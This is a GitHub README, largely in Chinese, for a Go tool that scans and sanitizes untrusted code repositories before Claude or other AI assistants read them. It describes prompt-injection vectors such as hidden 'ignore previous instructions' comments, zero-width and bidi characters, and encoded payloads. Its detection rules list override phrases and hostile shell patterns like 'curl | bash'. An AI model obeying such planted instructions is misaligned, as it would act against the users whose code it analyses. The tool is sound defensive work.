andreas2301/safeanalyse
GitHub: andreas2301/safeanalyse
在将不受信任的代码仓库提交给 Claude 等 AI 助手之前,通过多层安全管道扫描并脱敏,防御恶意代码中的 prompt 注入攻击。
Stars: 0 | Forks: 0
# safeanalyze
一个 Go CLI 工具,用于在将不受信任的代码仓库提供给 Claude 或其他 AI 助手**之前**对其进行清理和扫描。实现了受 [Zones of Distrust](https://github.com/bluvibytes/zone-of-distrust) 启发的纵深防御。
## 为什么需要?
通过恶意代码进行的 Prompt 注入是真实存在的。一个代码仓库可能包含:
- 告诉 Claude “忽略所有先前指令” 的隐藏注释
- 隐藏 payload 指令的零宽度 Unicode 字符
- 重新排列显示代码的双向文本覆盖字符
- 高熵编码的 payload(base64, hex)
- 混杂在合法源代码中的机密信息或恶意软件
**safeanalyze** 运行一个安全管道,确保 Claude 永远不会看到原始的、未经验证的代码。
## 管道
```
Untrusted Repo
|
v
[Clone / Read] <-- git clone wrapper with auto-cleanup
|
v
[External Scanners] <-- trufflehog, semgrep, yara (optional)
|
v
[Built-in YARA] <-- prompt injection, backdoor, credential rules
|
v
[Entropy Analysis] <-- high-entropy strings, base64/hex blobs
|
v
[Hidden Char Scan] <-- zero-width, bidi overrides, control chars
|
v
[Sanitization] <-- AST-aware comment stripping, non-ASCII removal,
size limits, extension filtering
|
v
[Diff Review] <-- colored diff showing exactly what was removed
|
v
[Format for AI] <-- markdown/JSON/plain, bounded chunks
|
v
[Sandbox Launch] <-- Docker or Firejail isolated Claude session
```
## 安装
```
git clone https://github.com/youruser/safeanalyze.git
cd safeanalyze
go build -o safeanalyze .
```
或者使用 `go install`:
```
go install github.com/youruser/safeanalyze@latest
```
## 快速开始
```
# 创建默认 config
./safeanalyze init
# 在 repo 上运行完整 pipeline
./safeanalyze ingest ./my-suspicious-repo
# 或逐步进行
./safeanalyze scan ./my-suspicious-repo # all scanners
./safeanalyze sanitize ./my-suspicious-repo # sanitize only
./safeanalyze diff ./my-suspicious-repo ./safeanalyze-out/sanitized
# Clone + analyze 远程 repo
./safeanalyze clone https://github.com/user/repo.git
# 在 ingestion 后于 sandbox 中启动 Claude
./safeanalyze ingest ./my-suspicious-repo --sandbox
```
## 命令
| 命令 | 描述 |
|---------|-------------|
| `init [path]` | 创建 `safeanalyze.yaml` 配置文件 |
| `scan ` | 运行外部扫描器、YARA 规则、熵分析、隐藏字符检测 |
| `sanitize [dst]` | 移除注释(AST 感知)、去除非 ASCII 字符、执行限制 |
| `ingest ` | 完整管道:扫描 → 清理 → 格式化为 AI 可用格式 |
| `diff ` | 以彩色差异形式显示被清理移除的内容 |
| `clone [dir]` | 克隆仓库,运行 ingest,自动删除原始克隆 |
## 功能特性
### 1. AST 感知的注释剥离
对于 **Go 文件**,使用 `go/ast` 精确移除注释,而不会触及包含 `//` 或 `/*` 的字符串字面量。对于其他语言,使用带有字符串字面量检测的增强型正则表达式引擎。
支持:Go, Python, JavaScript/TypeScript, Rust, Java, C/C++, Ruby, PHP, Swift, Kotlin, Scala, Shell, SQL, HTML, CSS, Lua 等。
### 2. 内置类 YARA 规则引擎
纯 Go 规则引擎,带有嵌入式检测模式:
| 规则 | 严重性 | 检测内容 |
|------|----------|---------|
| `prompt_injection_comment` | critical | “ignore previous instructions”、“system prompt”、“DAN mode”、“jailbreak” |
| `obfuscated_javascript` | high | eval(Function(...)), String.fromCharCode, atob, 十六进制转义 |
| `suspicious_shell` | high | curl | bash, wget | bash, netcat 反向 shell |
| `credential_hardcode` | medium | password=, api_key=, secret=, AWS 密钥 |
| `suspicious_imports` | medium | subprocess, child_process, urllib requests |
| `data_exfiltration` | high | 向外部 URL 发起 fetch, axios post, XMLHttpRequest |
| `backdoor_indicator` | critical | reverse_shell, bind_shell, keylogger, rootkit |
### 3. 熵分析
检测可能是编码过的机密信息或 payload 的高熵字符串:
- **香农熵 (Shannon entropy)** 评分(阈值可配置)
- **Base64 块检测**,并带有验证
- **Hex 块检测**
- 字符串字面量感知扫描(仅检查带引号的字符串)
- 过滤误报(UUIDs, URLs, 重复字符)
### 4. 隐藏 Unicode 字符检测
| 类别 | 字符 |
|----------|------------|
| **零宽度** | U+200B (ZWSP), U+200C (ZWNJ), U+200D (ZWJ), U+FEFF (BOM), U+2060 (WJ) |
| **双向覆盖** | U+202A-E (LTR/RTL embed/override/pop), U+2066-69 (isolates) |
| **控制字符** | C0/C1 控制字符(制表符/换行符除外) |
| **空白字符** | 不常见的空格(nbsp, em-space 等) |
| **格式字符** | Unicode 格式字符(Cf 类别) |
### 5. Diff 模式
对比原始文件与清理后的文件,并带有彩色输出:
```
# Side-by-side 更改
safeanalyze diff ./repo ./safeanalyze-out/sanitized
# Unified diff 格式
safeanalyze diff ./repo ./safeanalyze-out/sanitized --unified
```
### 6. Git Clone 包装器
克隆、分析并(可选地)删除原始仓库:
```
# Clone、ingest、删除 raw
safeanalyze clone https://github.com/user/repo.git
# Clone、ingest、保留 raw
safeanalyze clone https://github.com/user/repo.git --keep-raw
```
### 7. 沙盒启动
在摄取后于隔离环境中启动 Claude:
```
# Docker (Windows, macOS, Linux)
safeanalyze ingest ./repo --sandbox
# Firejail (仅限 Linux)
safeanalyze ingest ./repo --sandbox # auto-detects firejail on Linux
```
## 配置
`safeanalyze.yaml`:
```
scanners:
- name: trufflehog
command: "trufflehog filesystem {path} --json"
enabled: true
fail_on_findings: true
- name: semgrep
command: "semgrep --config=auto {path} --json"
enabled: false
fail_on_findings: false
sanitization:
strip_comments: true
remove_non_ascii: true
max_file_size_bytes: 50000
max_lines_per_file: 500
allowed_extensions:
- .go
- .py
- .js
- .ts
- .rs
excluded_paths:
- .git
- node_modules
- vendor
hidden_chars:
enabled: true
categories:
- zero_width
- bidi
- control
fail_on_findings: true
entropy:
enabled: true
threshold: 4.5
min_length: 20
fail_on_findings: false
yara:
enabled: true
fail_on_findings: true
output:
format: markdown # markdown, json, plain
single_file: false
include_file_tree: true
out_dir: ./safeanalyze-out
sandbox:
mode: none # none, docker, firejail
docker_image: alpine:latest
firejail_profile: default
```
## 外部扫描器依赖项(可选)
| 工具 | 安装 | 目的 |
|------|---------|---------|
| `trufflehog` | `brew install trufflesecurity/trufflehog/trufflehog` | 机密信息检测 |
| `semgrep` | `pip install semgrep` | 静态分析 |
| `git` | 系统包 | Clone 包装器 |
内置的 YARA、熵和隐藏字符检测不需要外部工具。
## 沙盒建议
即使在清理之后,也要在隔离环境中运行 Claude:
```
# Linux (firejail)
firejail --net=none --private --read-only=/home/user claude
# Docker (跨平台)
docker run --rm -it --network none --read-only \
-v $(pwd)/safeanalyze-out/ingest:/ingest:ro \
claude-sandbox
# 或让 safeanalyze 启动它:
safeanalyze ingest ./repo --sandbox
```
## 架构
```
cmd/ Cobra CLI commands
pkg/
aststrip/ Go AST-based comment stripping + regex fallback
config/ YAML configuration loading
diff/ Line-by-line diff engine (LCS-based)
entropy/ Shannon entropy + base64/hex detection
hiddenchars/ Unicode suspicious character detection
ingest/ Markdown/JSON/plain formatter for AI consumption
sandbox/ Cross-platform sandbox abstraction (Docker/Firejail)
sanitize/ Comment stripper + ASCII enforcer + size limits
scanner/ External tool orchestrator
yara/ Pure-Go YARA-like rule engine
utils/ Filesystem helpers
```
## 许可证
MPL
标签:AI安全, AST解析, Chat Copilot, DevSecOps, DNS信息、DNS暴力破解, DNS 反向解析, Docker, EVTX分析, Firejail, Go语言, StruQ, YARA规则, 上游代理, 代码净化, 代码安全, 代码审查, 反混淆, 大模型安全, 安全扫描, 安全防御评估, 安全防护, 对抗攻击, 提示注入防御, 敏感信息检测, 文档安全, 日志审计, 时序注入, 沙盒执行, 源代码安全, 源码分析, 漏洞枚举, 熵分析, 程序破解, 请求拦截, 零宽字符检测